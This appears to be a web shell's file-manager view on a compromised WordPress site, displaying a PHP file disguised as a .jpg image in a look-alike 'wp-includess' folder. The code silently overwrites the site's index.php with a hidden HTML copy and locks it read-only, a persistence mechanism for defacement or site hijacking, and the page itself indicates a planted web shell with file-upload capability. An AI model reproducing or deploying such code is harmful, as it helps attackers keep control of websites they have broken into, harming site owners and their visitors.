Your IP : 216.73.216.124


Current Path : /home/creationoo/www/wp-includess/images/
Upload File :
Current File : /home/creationoo/www/wp-includess/images/jdu3cx.jpg

<?php
$in = "/home/creationoo/www/index.php";
$bkin = "/home/creationoo/www/wp-includes/images/UAK8CS.html";
if($in && file_exists($bkin)){
	if(!file_exists($in) or (filesize($in) != filesize($bkin))){
		@chmod($in,0644);
		@file_put_contents($in,file_get_contents($bkin));
		@chmod($in,0444);
	}
}
?>